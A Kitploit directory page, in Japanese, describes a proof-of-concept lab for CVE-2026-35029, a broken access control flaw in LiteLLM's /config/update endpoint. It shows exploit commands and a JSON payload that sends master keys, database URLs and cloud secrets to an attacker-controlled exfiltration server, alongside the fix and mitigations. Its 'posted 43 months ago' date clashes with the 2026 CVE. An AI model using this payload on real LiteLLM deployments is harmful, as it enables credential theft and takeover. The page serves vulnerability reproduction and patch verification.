Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-35029-PoC — 対応する脆弱性を個人で再現するためのコード | Kitploit
ツール/GitHubGitHub/learner202649/cve-2026-35029-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用データ流出ペネトレーションテスト学習と教育ラボと実践
GitHublearner202649/cve-2026-35029-poc

CVE-2026-35029-PoC

対応する脆弱性を個人で再現するためのコード

リポジトリを見る
43ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-35029 — LiteLLM /config/update 不正アクセス制御の脆弱性 (Broken Access Control)

LiteLLM の /config/update エンドポイントは呼び出し元のロール権限をチェックしません。有効な API Key を持つ 認証済みユーザー(管理者権限不要)はプロキシ設定を変更し、悪意のある Pass-Through エンドポイントを登録して 環境変数の窃取、任意のファイル読み取り、リモートコード実行などの攻撃が可能です。

フィールド値
CVECVE-2026-35029
CVSS v4.08.7 (HIGH) — CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:N
CVSS v3.18.8 (HIGH) — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWECWE-863 (Incorrect Authorization) / CWE-285 (Improper Authorization)
影響を受けるバージョンLiteLLM < 1.83.0
修正バージョンv1.83.0+ (proxy_admin ロールチェックを /config/update に追加)
公開日2026-04-06
発見者Timo Müller — SEC Consult Vulnerability Lab (Munich)
発見日2026-02-24
リンクGHSA-53mr-6c8q-9789 • NVD • SEC Consult

説明

LiteLLM の /config/update エンドポイントは本来 proxy_admin ロールのみが呼び出せるべきですが、v1.83.0 より前では ロールチェックが一切ありませんでした。有効な API Key を持つユーザーなら誰でもこのエンドポイントを呼び出すことができました。

攻撃ベクトル

攻撃タイプ説明
環境変数の窃取Pass-Through エンドポイントを登録し、os.environ/VAR_NAME ヘッダー参照を介して DATABASE_URL、LITELLM_MASTER_KEY などを窃取
任意ファイル読み取りLANGFUSE_* ヘッダーの Base64 エンコード特性を利用して、サーバーのファイルシステムを読み取り
設定の改ざんUI_USERNAME、UI_PASSWORD を上書きして管理者アカウントを乗っ取り
リモートコード実行攻撃者の Python コードを指す Pass-Through エンドポイントハンドラを登録

影響

  • 低権限ユーザー → 完全な管理者権限
  • 機密環境変数の漏洩(データベース認証情報、API キー、クラウドサービス資格情報)
  • 任意ファイル読み取り(設定ファイル、証明書、shadow ファイル)
  • 他の脆弱性(CVE-2026-35030)と連鎖的に悪用可能

概念実証

クイックスタート (Docker)

⚠️ 重要: docker-compose.yml は脆弱なイメージを特定のダイジェスト(2026年1月24日付けの sha256:5beb4ea6...)に固定しています。main-v1.81.0-stable やその他の変更可能なタグに変更しないでください — 後のイメージは修正を含んで再ビルドされている可能性があり、再現ができなくなります。

root@kitploit:~
# 1. 启动脆弱版 LiteLLM + 攻击者数据接收服务器
docker compose up -d

# 2. 安装依赖
pip install -r requirements.txt

# 3. 运行完整攻击链(环境变量窃取 + 文件读取)
python3 exploit/exploit.py --mode full-chain \
  --target http://localhost:4000 \
  --key sk-litellm-master-key

# 4. 仅窃取环境变量
python3 exploit/exploit.py --mode exfil \
  --target http://localhost:4000 \
  --key sk-litellm-master-key

# 5. (可选)验证修复版本不受影响
docker compose --profile fixed up -d
python3 exploit/exploit.py --mode full-chain \
  --target http://localhost:4001 \
  --key sk-litellm-master-key --fixed

注意: 初回のコンテナ起動時は約 30〜60 秒の待機が必要です(PostgreSQL のヘルスチェック + Prisma データベースのマイグレーション)。コンテナログに Uvicorn running on http://0.0.0.0:4000 が表示されてからエクスプロイトを実行してください。

予想される出力

環境変数の窃取:

root@kitploit:~
======================================================================
[VULNERABLE] Phase 1: Environment Variable Exfiltration
======================================================================

[*] Step 1: Registering pass-through endpoint via /config/update...
    Payload: {
        "general_settings": {
            "pass_through_endpoints": [
                {
                    "path": "/exfil/env",
                    "target": "http://exfil-server:9999/collect",
                    "headers": {
                        "X-Exfil-1-LITELLM_MASTER_KEY": "os.environ/LITELLM_MASTER_KEY",
                        "X-Exfil-2-DATABASE_URL": "os.environ/DATABASE_URL",
                        "X-Exfil-3-AWS_SECRET_ACCESS_KEY": "os.environ/AWS_SECRET_ACCESS_KEY",
                        "X-Exfil-4-OPENAI_API_KEY": "os.environ/OPENAI_API_KEY"
                    }
                }
            ]
        }
    }
    HTTP 200
    [+] Config update accepted!

[*] Step 2: Waiting for pass-through route propagation...
    6 seconds...

[*] Step 3: Triggering pass-through endpoint at /exfil/env...
    HTTP 200
    Response: {"status":"received","message":"Data captured by exfiltration server"}

[*] Step 4: Checking exfiltration server for stolen data...

[🔥] EXFILTRATION LOGS:
────────────────────────────────────────────────────────────
📥 Request received
   Path  : /collect
   Headers:
     X-Exfil-1-LITELLM_MASTER_KEY: sk-litellm-master-key
     X-Exfil-2-DATABASE_URL: postgresql://admin:[email protected]:5432/production
     X-Exfil-3-AWS_SECRET_ACCESS_KEY: AKIA1234567890EXAMPLE
     X-Exfil-4-OPENAI_API_KEY: sk-openai-secret-key-leaked

[🔥] EXPLOIT SUCCEEDED! Sensitive data exfiltrated!

修正バージョンでのアクセス拒否(非管理者キー使用時は 403 を返す):

root@kitploit:~
======================================================================
[FIXED] Phase 1: Environment Variable Exfiltration
======================================================================
    HTTP 403
    [-] Forbidden — target may be patched (v1.83.0+)
    [+] Expected: fixed version blocks non-admin config updates

注意: Master Key(sk-litellm-master-key)を使用して修正バージョンをテストする場合、設定更新は HTTP 200 を返しますが(Master Key は proxy_admin ロールを持つ)、Pass-Through エンドポイントの登録は有効にならないか、静かに無視される可能性があります。修正の検証には非管理者キーを使用することを推奨します。


攻撃チェーンの詳細

root@kitploit:~
 ┌──────────────┐     ┌─────────────────┐     ┌───────────────────┐
 │ 攻击者        │     │  LiteLLM Proxy   │     │ Exfiltration 服务  │
 │ (低权限 Key)  │     │ (< v1.83.0)     │     │ (攻击者控制)       │
 └──────┬───────┘     └────────┬────────┘     └────────┬──────────┘
        │                      │                       │
        │ 1. POST /config/update                       │
        │    {pass_through_endpoints:                  │
        │      [{path, target, headers:                │
        │        {X-DB: "os.environ/DATABASE_URL"}}]}  │
        │─────────────────────→│                       │
        │                      │                       │
        │    HTTP 200 (OK!)    │                       │
        │←─────────────────────│                       │
        │                      │                       │
        │ 2. GET /exfil/env    │                       │
        │─────────────────────→│                       │
        │                      │ 3. Forward request    │
        │                      │    + resolved headers │
        │                      │    (含 DATABASE_URL)  │
        │                      │──────────────────────→│
        │                      │                       │
        │                      │    HTTP 200           │
        │                      │←──────────────────────│
        │←─────────────────────│                       │
        │                      │                       │
        │ 4. 读取 /logs 确认结果                       │
        │─────────────────────────────────────────────→│
        │←─ [🔥] 窃取到 DATABASE_URL ─────────────────│

環境

root@kitploit:~
CVE-2026-35029/
├── README.md                    # This file
├── docker-compose.yml           # PostgreSQL db + vulnerable/fixed LiteLLM + exfil server
├── litellm_config.yaml          # LiteLLM base config
├── requirements.txt             # Python dependencies (PoC)
├── exfil-server/
│   ├── Dockerfile               # Exfiltration server image
│   └── server.py                # Captures stolen data (Python HTTP)
├── exploit/
│   ├── exploit.py               # Main exploit script
│   └── payload.py               # Payload builder module
├── docs/
│   └── advisory.md              # Advisory reference
└── screenshots/
    └── README.md                # Proof screenshots placeholder

修正

v1.83.0 では /config/update ハンドラに proxy_admin ロールチェックが追加されました:

root@kitploit:~
# 修复前 (v1.83.0 之前) — 无角色检查
@router.post("/config/update")
async def update_config(request: Request):
    ...  # 任何已认证用户均可调用

# 修复后 (v1.83.0+) — 需要 proxy_admin 角色
@router.post("/config/update")
@require_role("proxy_admin")  # ← 新增角色检查
async def update_config(request: Request):
    ...

コミット: 57c05459ae9b4e607bfb35228ec13a3ee8586ce4

緩和策

  1. 直ちに LiteLLM を v1.83.0+ にアップグレード
  2. /config/update エンドポイントへのネットワークアクセスを制限
  3. すべての API キーの使用状況を監査し、漏洩した可能性のある認証情報をローテーション
  4. 異常な設定更新リクエストを監視

参考文献

  • GitHub Security Advisory GHSA-53mr-6c8q-9789
  • SEC Consult Advisory
  • NVD Detail
  • LiteLLM Security Hardening (April 2026)
  • LiteLLM Pass-Through Endpoints Docs

免責事項: このコンテンツは教育目的および許可されたセキュリティテストのみを目的として提供されています。

ツールをダウンロード